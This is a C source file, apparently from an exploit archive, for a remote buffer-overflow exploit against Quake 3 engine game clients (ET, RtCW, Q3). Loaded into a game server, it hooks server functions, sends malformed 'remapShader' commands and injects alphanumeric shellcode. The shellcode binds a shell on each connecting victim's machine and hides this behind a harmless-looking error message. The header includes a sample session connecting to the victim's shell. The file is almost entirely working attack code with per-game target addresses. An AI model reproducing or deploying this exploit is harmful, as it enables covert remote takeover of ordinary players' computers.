245 lines
No EOL
7.6 KiB
C
245 lines
No EOL
7.6 KiB
C
// remap_this.c - "R_RemapShader()" q3 engine 1.32b client remote bof exploit
|
|
// by landser - landser at hotmail.co.il
|
|
//
|
|
// this code works as a preloaded shared library on a game server,
|
|
// it hooks two functions on the running server:
|
|
// svc_directconnect() that is called when a client connects,
|
|
// and sv_sendservercommand() which we use to send malformed "remapShader" commands to clients.
|
|
// vuln clients connecting to the server will bind a shell on a chosen port (#define PORT) and exit cleanly with an unsuspicious error message.
|
|
//
|
|
// vuln: latest linux clients of ET, rtcw, and q3 on boxes with +x stack (independent of distro)
|
|
// (win32 clients are vuln too but not included here)
|
|
//
|
|
// usage:
|
|
// gcc remap_this.c -shared -fPIC -o remap_this.so
|
|
// and run a server with env LD_PRELOAD="./remap_this.so"
|
|
//
|
|
// -----------------------------------------------------
|
|
// [luser@box ~/wolfenstein]$ LD_PRELOAD="./remap_this.so" ./wolfded.x86 +set net_port 5678 +map mp_beach
|
|
// remap_this.c by landser - landser at hotmail.co.il
|
|
//
|
|
// game: RtCW 1.41 Dedicated.
|
|
// [...]
|
|
// directconnect(): 10.0.0.4 connected
|
|
// sendservercommand() called
|
|
// sendservercommand() called
|
|
// sendservercommand() called
|
|
// [...]
|
|
// [luser@box ~/wolfenstein]$ nc 10.0.0.4 27670 -vv
|
|
// sus4 [10.0.0.4] 27670 (?) open
|
|
// id
|
|
// uid=1000(luser) gid=100(lusers)
|
|
// -----------------------------------------------------
|
|
//
|
|
// visit www.nixcoders.org for open source linux cheats
|
|
|
|
#define _GNU_SOURCE
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <unistd.h>
|
|
#include <string.h>
|
|
#include <dlfcn.h>
|
|
#include <sys/mman.h>
|
|
|
|
#define SILENT // hide the crappy server output
|
|
#define PORT 27670 // bindshell port. some values are invalid
|
|
|
|
struct netaddr { // from q3-1.32b/qcommon/qcommon.h
|
|
int type;
|
|
unsigned char ip[4];
|
|
unsigned char ipx[10];
|
|
unsigned short port;
|
|
};
|
|
|
|
struct {
|
|
char *name;
|
|
char *fn;
|
|
unsigned long retaddr; // something that jumps to %esp
|
|
unsigned long sendservercommand; // address of sv_sendservercommand()
|
|
unsigned long directconnect; // address of svc_directconnect()
|
|
int hooklen; // for both sendservercommand and directconnect
|
|
unsigned long errormsg; // address of error string
|
|
unsigned long comerror; // address of com_error()
|
|
int popas; // num of popa instructions before shellcode
|
|
int gap; // gap between %esp to %eip when prog gets to the last shellcode instruction
|
|
} games[] = {
|
|
{"ET 2.60 Dedicated", "etded",
|
|
0x081b4133, 0x08056c10, 0x0804e880, 6, 0x081a6a65, 0x0806a1a0, 14, 12},
|
|
{"RtCW 1.41 Dedicated", "wolfded",
|
|
0x080c4356, 0x0805ee94, 0x08058740, 9, 0x08187772, 0x080a87e8, 14, 12},
|
|
{"Quake 3 1.32b Dedicated", "q3ded",
|
|
0x080a200b, 0x0805fa68, 0x08059884, 9, 0x08167635, 0x08094688, 11, 27},
|
|
};
|
|
|
|
const int ngames = sizeof(games) / sizeof(games[0]);
|
|
const unsigned short int port = PORT;
|
|
|
|
static void *hook (void *, int, void *);
|
|
static void sendservercommand (void *, const char *, ...);
|
|
static void directconnect (struct netaddr);
|
|
static void writebuf (void);
|
|
|
|
void (*_sendservercommand)(void *, const char *, ...);
|
|
void (*_directconnect)(struct netaddr);
|
|
|
|
int c = -1;
|
|
unsigned char buf[1024];
|
|
|
|
// shellcode (286 bytes):
|
|
// fork()s,
|
|
// the parent proc calls com_error() with an error message (errormsg var),
|
|
// the child proc binds a shell on a chosen port
|
|
// unallowed chars: 0x00, 0x22, 0x2e, 0x5c, >=0x80
|
|
unsigned char sc[] =
|
|
"\x68\x03\x5a\x70\x50\x58\x05\x01\x01\x7b\x71\x50\x68\x57\x50\x7f\x69"
|
|
"\x58\x05\x01\x7d\x01\x01\x50\x68\x70\x30\x6a\x06\x58\x66\x05\x7b\x76"
|
|
"\x50\x68\x54\x5b\x52\x53\x68\x2f\x62\x69\x6e\x68\x2f\x73\x68\x68\x68"
|
|
"\x0b\x58\x68\x2f\x68\x48\x78\x79\x69\x58\x05\x01\x01\x7f\x01\x50\x68"
|
|
"\x3e\x57\x50\x01\x58\x05\x01\x01\x7d\x7f\x50\x68\x75\x1c\x59\x6a\x68"
|
|
"\x50\x01\x48\x40\x58\x66\x05\x7d\x7f\x50\x68\x5b\x6a\x02\x58\x68\x7f"
|
|
"\x50\x53\x58\x58\x66\x40\x50\x68\x69\x65\x57\x50\x58\x05\x01\x01\x01"
|
|
"\x7d\x50\x68\x57\x54\x59\x43\x68\x7f\x5f\x50\x50\x58\x66\x40\x50\x68"
|
|
"\x69\x65\x57\x50\x58\x05\x01\x01\x01\x7d\x50\x68\x7f\x6a\x04\x5b\x58"
|
|
"\x66\x40\x50\x68\x69\x65\x57\x50\x58\x05\x01\x01\x01\x7d\x50\x68\x51"
|
|
"\x50\x54\x59\x68\x45\x55\x6a\x10\x68\x5b\x0e\x50\x44\x58\x05\x02\x01"
|
|
"\x7d\x01\x50" "PORT" "\x66\x68\x5b\x5d\x52\x66\x68\x53\x58\x50\x01"
|
|
"\x58\x05\x01\x01\x7d\x7f\x50\x68\x52\x53\x6a\x02\x68\x4a\x6a\x01\x5b"
|
|
"\x68\x58\x6a\x01\x5a\x68\x07\x50\x6a\x66\x58\x66\x05\x01\x73\x50\x68"
|
|
"\x67" "CM1" "\x58\x05\x01" "CM2" "\x50\x68\x6a\x02\x6a\x01\x68" "ERRM"
|
|
"\x68\x40\x74\x0f\x68\x68\x57\x50\x7f\x47\x58\x05\x01\x7d\x01\x01\x50"
|
|
"\x68\x41\x41\x6a\x02\x74\x0c\x75\x0a";
|
|
|
|
void __attribute__ ((constructor)) init (void) {
|
|
char buf[256];
|
|
int ret;
|
|
|
|
printf("remap_this.c by landser - landser at hotmail.co.il\n\n");
|
|
|
|
ret = readlink("/proc/self/exe", buf, sizeof buf);
|
|
if (ret < 0) {
|
|
perror("readlink()");
|
|
exit(EXIT_FAILURE);
|
|
}
|
|
buf[ret] = '\0';
|
|
|
|
for (c=0;c<ngames;c++)
|
|
if (strstr(buf, games[c].fn)) break;
|
|
|
|
if (c == ngames) {
|
|
printf("binary doesnt match any of the targets.\n");
|
|
exit(EXIT_FAILURE);
|
|
}
|
|
|
|
printf("game: %s.\n\n", games[c].name);
|
|
|
|
writebuf();
|
|
|
|
_sendservercommand = hook((void *)games[c].sendservercommand, games[c].hooklen, &sendservercommand);
|
|
_directconnect = hook((void *)games[c].directconnect, games[c].hooklen, &directconnect);
|
|
}
|
|
|
|
int fputs (const char *s, FILE *fp) {
|
|
static int (*_fputs)(const char *, void *);
|
|
if (!_fputs) _fputs = dlsym(RTLD_NEXT, "fputs");
|
|
|
|
#ifdef SILENT
|
|
if (strncmp(s, "---", 3)) return 1;
|
|
#endif
|
|
|
|
return _fputs(s, fp);
|
|
}
|
|
|
|
static void sendservercommand (void *client, const char *fmt, ...) {
|
|
printf("sendservercommand() called\n");
|
|
_sendservercommand(client, "%s", buf);
|
|
}
|
|
|
|
static void directconnect (struct netaddr addr) {
|
|
printf("directconnect(): %d.%d.%d.%d connected\n",
|
|
addr.ip[0], addr.ip[1], addr.ip[2], addr.ip[3]);
|
|
_directconnect(addr);
|
|
}
|
|
|
|
static void writebuf (void) {
|
|
unsigned char *cm1, *cm2, *ptr = buf;
|
|
int i, b;
|
|
|
|
strcpy(ptr, "remapShader ");
|
|
if (strstr(games[c].name, "Quake")) strcat(ptr, "j w ");
|
|
strcat(ptr, "\"");
|
|
ptr += strlen(ptr);
|
|
|
|
memset(ptr, '\b', 76);
|
|
ptr += 76;
|
|
|
|
memcpy(ptr, &games[c].retaddr, 4);
|
|
ptr += 4;
|
|
|
|
if (strstr(games[c].name, "Quake")) {
|
|
// replaces %ebp with %esp without using the stack
|
|
memcpy(ptr, "\x33\x2f\x31\x2f\x31\x27\x33\x27\x31\x27", 10);
|
|
ptr += 10;
|
|
}
|
|
|
|
memset(ptr, 0x61, games[c].popas); // 'popa' instructions
|
|
ptr += games[c].popas;
|
|
|
|
memcpy(ptr, sc, sizeof(sc));
|
|
|
|
memset(ptr + strlen(ptr) - 3, games[c].gap, 1);
|
|
memset(ptr + strlen(ptr) - 1, games[c].gap - 2, 1);
|
|
|
|
cm1 = strstr(ptr, "CM1");
|
|
cm2 = strstr(ptr, "CM2");
|
|
if (!cm1 || !cm2) abort();
|
|
|
|
for (i=0;i<3;i++) {
|
|
b = (games[c].comerror >> (8*i)) & 0xff;
|
|
|
|
if ((b-1) >= 0x7f) {
|
|
cm1[i] = 0x6b;
|
|
cm2[i] = b - 0x6b;
|
|
}
|
|
else {
|
|
cm1[i] = b - 1;
|
|
cm2[i] = 1;
|
|
}
|
|
}
|
|
|
|
ptr = strstr(ptr, "PORT");
|
|
if (!ptr) abort();
|
|
memcpy(ptr, "\x68\x68", 2); // 68 - pushl imm32
|
|
memcpy(ptr+2, &port, sizeof port);
|
|
|
|
ptr = strstr(ptr, "ERRM");
|
|
if (!ptr) abort();
|
|
memcpy(ptr, &games[c].errormsg, 4);
|
|
|
|
strcat(ptr, "\"");
|
|
if (!strstr(games[c].name, "Quake")) strcat(ptr, " j w");
|
|
}
|
|
|
|
#define PAGE(x) (void *)((unsigned long)x & 0xfffff000)
|
|
|
|
static void *hook (void *hfunc, int len, void *wfunc) {
|
|
void *newmem = malloc(len+5);
|
|
long rel32;
|
|
|
|
// copy 'len' bytes of instruction from 'hfunc' to 'newmem' and a 'jmp *hfunc' instruction after it
|
|
memcpy(newmem, hfunc, len);
|
|
memset(newmem+len, 0xe9, 1); // e9 - jmp rel32
|
|
rel32 = hfunc - (newmem+5);
|
|
memcpy(newmem+len+1, &rel32, sizeof rel32);
|
|
|
|
// make 'hfunc's address writable & executable
|
|
mprotect(PAGE(hfunc), 4096, PROT_READ|PROT_WRITE|PROT_EXEC);
|
|
|
|
// change the start of 'hfunc' to a 'jmp *wfunc' instruction
|
|
memset(hfunc, 0xe9, 1); // e9 - jmp rel32
|
|
rel32 = wfunc - (hfunc+5);
|
|
memcpy(hfunc+1, &rel32, sizeof rel32);
|
|
|
|
return newmem;
|
|
}
|
|
|
|
// milw0rm.com [2006-05-05]
|